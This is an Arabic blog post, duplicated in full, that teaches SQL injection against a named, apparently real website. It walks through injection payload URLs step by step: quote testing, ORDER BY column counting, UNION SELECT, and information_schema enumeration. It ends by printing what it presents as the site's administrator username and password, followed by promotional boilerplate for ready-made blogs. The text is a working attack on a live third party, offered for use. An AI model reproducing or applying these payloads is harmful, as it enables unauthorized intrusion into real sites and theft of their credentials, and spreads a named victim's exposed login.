ما هي ثغرة سكيول(sql)
sql هو خطئ برمجي أثناء تشكيل الموقع حيث تسمح للهكر بإسغلالها و إختراق الموقع و هي على أنواع مثل MYSQL و هذه الثغرات نستخدمها لتعامل مع قاعدة البينات و إعطائها أوامر مثل show users,DELET,EDIT و إلا أخره
كيفية يتم إستغلال هذه الثغرات:
يقوم الهكر بإستغلالها عبر أوامر مثلا
أريد أن أعرف المستخدم في هاذا الموقع
فيضع كود معين لإظهار اليوزر أو المستخدم
كيف:
هذا موقع مصاب
http://www.velasco-asesores.com/detTip.php?id=1
و نبدء الشرح
أولا لنارى إذا الموقع مصاب بثغرة sql نضع علامة ' في آخر الرابط ليصبح
'http://www.velasco-asesores.com/detTip.php?id=1
الموقع مصاب
نريد الآن مكان لإستخراج العماويد نضع هاذا الكود:--4+order+by+
ليصبح
http://www.velasco-asesores.com/detTip.php?id=1+order+by+4--
الآن نريد أن نعرف عدد عوامد أو من هو العامود المصاب
نضع هذا الكود:
--union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+
و نضع قب لرقم id=1 - ليصبح id=-1
ليصبح: http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2C2%2C3%2C4
العامود المصاب هو 4
الآن نريد معرفة الأدمن و الاسورد
نضع هاضا الكود مكان العمود رقم 2:concat(column_name,0x3e,table_schema,0x3e,table_name)
و نضع هاذا في آخر الرابط: +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
ليصبح:http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2Cconcat%28column_name%2C0x3e%2Ctable_schema%2C0x3e%2Ctable_name%29%2C3%2C4+from+information_schema.columns+where+column_name+like+char%2837%2C+112%2C+97%2C+115%2C+115%2C+37%29--
password>velasco_asesores>usuarios
الآن نأخذ إسم usuarios و نضع +from+
و نضع كلمة password مكان عامود 2 و login مكان العامود 3
ليصبح
http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2Cpassword%2C3%2C4+from+usuar
username=velasco
password=admin
sql هو خطئ برمجي أثناء تشكيل الموقع حيث تسمح للهكر بإسغلالها و إختراق الموقع و هي على أنواع مثل MYSQL و هذه الثغرات نستخدمها لتعامل مع قاعدة البينات و إعطائها أوامر مثل show users,DELET,EDIT و إلا أخره
كيفية يتم إستغلال هذه الثغرات:
يقوم الهكر بإستغلالها عبر أوامر مثلا
أريد أن أعرف المستخدم في هاذا الموقع
فيضع كود معين لإظهار اليوزر أو المستخدم
كيف:
هذا موقع مصاب
http://www.velasco-asesores.com/detTip.php?id=1
و نبدء الشرح
أولا لنارى إذا الموقع مصاب بثغرة sql نضع علامة ' في آخر الرابط ليصبح
'http://www.velasco-asesores.com/detTip.php?id=1
الموقع مصاب
نريد الآن مكان لإستخراج العماويد نضع هاذا الكود:--4+order+by+
ليصبح
http://www.velasco-asesores.com/detTip.php?id=1+order+by+4--
الآن نريد أن نعرف عدد عوامد أو من هو العامود المصاب
نضع هذا الكود:
--union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+
و نضع قب لرقم id=1 - ليصبح id=-1
ليصبح: http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2C2%2C3%2C4
العامود المصاب هو 4
الآن نريد معرفة الأدمن و الاسورد
نضع هاضا الكود مكان العمود رقم 2:concat(column_name,0x3e,table_schema,0x3e,table_name)
و نضع هاذا في آخر الرابط: +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
ليصبح:http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2Cconcat%28column_name%2C0x3e%2Ctable_schema%2C0x3e%2Ctable_name%29%2C3%2C4+from+information_schema.columns+where+column_name+like+char%2837%2C+112%2C+97%2C+115%2C+115%2C+37%29--
password>velasco_asesores>usuarios
الآن نأخذ إسم usuarios و نضع +from+
و نضع كلمة password مكان عامود 2 و login مكان العامود 3
ليصبح
http://www.velasco-asesores.com/detTip.php?id=-1+union+select+1%2Cpassword%2C3%2C4+from+usuar
username=velasco
password=admin
---------------------------------------------------------------
روابط التحميل والمشاهدة، الروابط المباشرة للتحميل
او
شاهد هذا الفيديو القصير لطريقة التحميل البسيطة
كيف تحصل على مدونة جاهزة بآلاف المواضيع والمشاركات من هنا
شاهد قناة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على اليوتيوب لمزيد من الشرح من هنا
رابط مدونة منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات في أي وقت حــــتى لو تم حذفها من هنا
شاهد صفحة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على الفيس بوك لمزيد من الشرح من هنا
شاهد صفحة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على الفيس بوك لمزيد من الشرح من هنا
تعرف على ترتيب مواضيع منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات (حتى لا تختلط عليك الامور) من هنا
ملاحظة هامة: كل عمليات تنزيل، رفع، وتعديل المواضيع الجاهزة تتم بطريقة آلية، ونعتذر عن اي موضوع مخالف او مخل بالحياء مرفوع بالمدونات الجاهزة بآلاف المواضيع والمشاركات، ولكم ان تقوموا بحذف هذه المواضيع والمشاركات والطريقة بسيطة وسهلة. ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــسلامـ.
إرسال تعليق